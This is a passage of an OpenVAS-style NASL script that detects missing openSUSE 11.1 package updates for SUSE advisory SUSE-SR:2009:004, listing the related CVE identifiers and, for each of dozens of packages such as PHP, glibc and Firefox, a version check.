USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SR:2009:004. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.\";\n\ntag_solution = \"Update all out of date packages.\";\n \nif(description)\n{\n script_id(63412);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-18 23:13:28 +0100 (Wed, 18 Feb 2009)\");\n script_cve_id(\"CVE-2006-3835\", \"CVE-2007-0184\", \"CVE-2007-0185\", \"CVE-2007-2377\", \"CVE-2007-2449\", \"CVE-2007-2450\", \"CVE-2007-3382\", \"CVE-2007-3385\", \"CVE-2007-3386\", \"CVE-2007-5333\", \"CVE-2007-5342\", \"CVE-2007-5461\", \"CVE-2007-5613\", \"CVE-2007-5615\", \"CVE-2007-6286\", \"CVE-2008-0002\", \"CVE-2008-1232\", \"CVE-2008-1586\", \"CVE-2008-1947\", \"CVE-2008-2235\", \"CVE-2008-2370\", \"CVE-2008-2938\", \"CVE-2008-3231\", \"CVE-2008-3651\", \"CVE-2008-3652\", \"CVE-2008-3663\", \"CVE-2008-3796\", \"CVE-2008-4577\", \"CVE-2008-5086\", \"CVE-2008-5233\", \"CVE-2008-5234\", \"CVE-2008-5235\", \"CVE-2008-5236\", \"CVE-2008-5237\", \"CVE-2008-5238\", \"CVE-2008-5239\", \"CVE-2008-5240\", \"CVE-2008-5241\", \"CVE-2008-5242\", \"CVE-2008-5243\", \"CVE-2008-5244\", \"CVE-2008-5245\", \"CVE-2008-5246\", \"CVE-2008-5247\", \"CVE-2008-5248\", \"CVE-2008-5250\", \"CVE-2008-5252\", \"CVE-2008-5256\", \"CVE-2008-5302\", \"CVE-2008-5557\", \"CVE-2008-5587\", \"CVE-2008-5658\", \"CVE-2008-5718\", \"CVE-2009-0030\", \"CVE-2009-0310\", \"CVE-2009-0313\", \"CVE-2009-0416\", \"CVE-2009-0490\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Summary SUSE-SR:2009:004\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~3.0.6~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-branding-upstream\", rpm:\"MozillaFirefox-branding-upstream~3.0.6~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~3.0.6~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"aaa_base\", rpm:\"aaa_base~11.1~10007.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport\", rpm:\"apport~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-crashdb-opensuse\", rpm:\"apport-crashdb-opensuse~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-gtk\", rpm:\"apport-gtk~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-qt\", rpm:\"apport-qt~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"apport-retrace\", rpm:\"apport-retrace~0.114~8.5.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi\", rpm:\"at-spi~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-devel\", rpm:\"at-spi-devel~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-doc\", rpm:\"at-spi-doc~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"at-spi-lang\", rpm:\"at-spi-lang~1.24.0~2.6.6\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audacity\", rpm:\"audacity~1.3.5~49.12.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile\", rpm:\"audiofile~0.2.6~142.19.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"audiofile-devel\", rpm:\"audiofile-devel~0.2.6~142.19.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"compat-openssl097g\", rpm:\"compat-openssl097g~0.9.7g~146.9.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dice\", rpm:\"dice~0.1.9~1.3.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dice-debug\", rpm:\"dice-debug~0.1.9~1.3.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dice-devel\", rpm:\"dice-devel~0.1.9~1.3.4\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glade3\", rpm:\"glade3~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glade3-lang\", rpm:\"glade3-lang~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-packagekit\", rpm:\"gnome-packagekit~0.3.11~2.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-packagekit-lang\", rpm:\"gnome-packagekit-lang~0.3.11~2.2.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel\", rpm:\"gnome-panel~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-devel\", rpm:\"gnome-panel-devel~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-doc\", rpm:\"gnome-panel-doc~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-extras\", rpm:\"gnome-panel-extras~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gnome-panel-lang\", rpm:\"gnome-panel-lang~2.24.1~2.25.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2\", rpm:\"gtk2~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-branding-upstream\", rpm:\"gtk2-branding-upstream~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-devel\", rpm:\"gtk2-devel~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-doc\", rpm:\"gtk2-doc~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"gtk2-lang\", rpm:\"gtk2-lang~2.14.4~8.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun\", rpm:\"java-1_6_0-sun~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-alsa\", rpm:\"java-1_6_0-sun-alsa~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-devel\", rpm:\"java-1_6_0-sun-devel~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-src\", rpm:\"java-1_6_0-sun-src~1.6.0.u12~1.2.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit-devel\", rpm:\"libQtWebKit-devel~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libQtWebKit4\", rpm:\"libQtWebKit4~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgladeui-1-8\", rpm:\"libgladeui-1-8~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgladeui-1_0-devel\", rpm:\"libgladeui-1_0-devel~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libgladeui-1_0-doc\", rpm:\"libgladeui-1_0-doc~3.5.2~7.25.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipulog-devel\", rpm:\"libipulog-devel~1.24~129.51.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpython2_6-1_0\", rpm:\"libpython2_6-1_0~2.6.0~2.22.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqdialogsolver1\", rpm:\"libqdialogsolver1~1.2.6~1.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqdialogsolver1-devel\", rpm:\"libqdialogsolver1-devel~1.2.6~1.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4\", rpm:\"libqt4~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel\", rpm:\"libqt4-devel~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-devel-doc\", rpm:\"libqt4-devel-doc~4.4.3~4.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-qt3support\", rpm:\"libqt4-qt3support~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql\", rpm:\"libqt4-sql~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-mysql\", rpm:\"libqt4-sql-mysql~4.4.3~11.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-postgresql\", rpm:\"libqt4-sql-postgresql~4.4.3~11.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-sqlite\", rpm:\"libqt4-sql-sqlite~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-sql-unixODBC\", rpm:\"libqt4-sql-unixODBC~4.4.3~11.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libqt4-x11\", rpm:\"libqt4-x11~4.4.3~4.8.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libsatsolver-devel\", rpm:\"libsatsolver-devel~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff-devel\", rpm:\"libtiff-devel~3.8.2~133.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libtiff3\", rpm:\"libtiff3~3.8.2~133.35.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt\", rpm:\"libvirt~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-devel\", rpm:\"libvirt-devel~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-doc\", rpm:\"libvirt-doc~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libvirt-python\", rpm:\"libvirt-python~0.4.6~11.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libxml2-doc\", rpm:\"libxml2-doc~2.7.1~9.7.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp\", rpm:\"libzypp~5.25.3~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libzypp-devel\", rpm:\"libzypp-devel~5.25.3~0.1.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190\", rpm:\"mozilla-xulrunner190~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-devel\", rpm:\"mozilla-xulrunner190-devel~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-gnomevfs\", rpm:\"mozilla-xulrunner190-gnomevfs~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mozilla-xulrunner190-translations\", rpm:\"mozilla-xulrunner190-translations~1.9.0.6~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nano\", rpm:\"nano~2.1.7~1.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk\", rpm:\"netatalk~2.0.3~246.13.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"netatalk-devel\", rpm:\"netatalk-devel~2.0.3~246.13.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nfs-client\", rpm:\"nfs-client~1.1.3~18.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nfs-doc\", rpm:\"nfs-doc~1.1.3~18.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nfs-kernel-server\", rpm:\"nfs-kernel-server~1.1.3~18.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.9~2.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp\", rpm:\"openslp~1.2.0~168.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-devel\", rpm:\"openslp-devel~1.2.0~168.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openslp-server\", rpm:\"openslp-server~1.2.0~168.10.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"parted\", rpm:\"parted~1.8.8~91.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"parted-devel\", rpm:\"parted-devel~1.8.8~91.8.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.10.0~62.17.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.10.0~62.17.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.10.0~62.17.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"perl-satsolver\", rpm:\"perl-satsolver~0.13.2~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-hash\", rpm:\"php5-hash~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-readline\", rpm:\"php5-readline~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tidy\", rpm:\"php5-tidy~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlwriter\", rpm:\"php5-xmlwriter~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zip\", rpm:\"php5-zip~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.6~49.14.3\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"powerdevil\", rpm:\"powerdevil~1.4.1~4.5.2\", rls:\"openSUSE11.1\")) != NULL) {\n report += 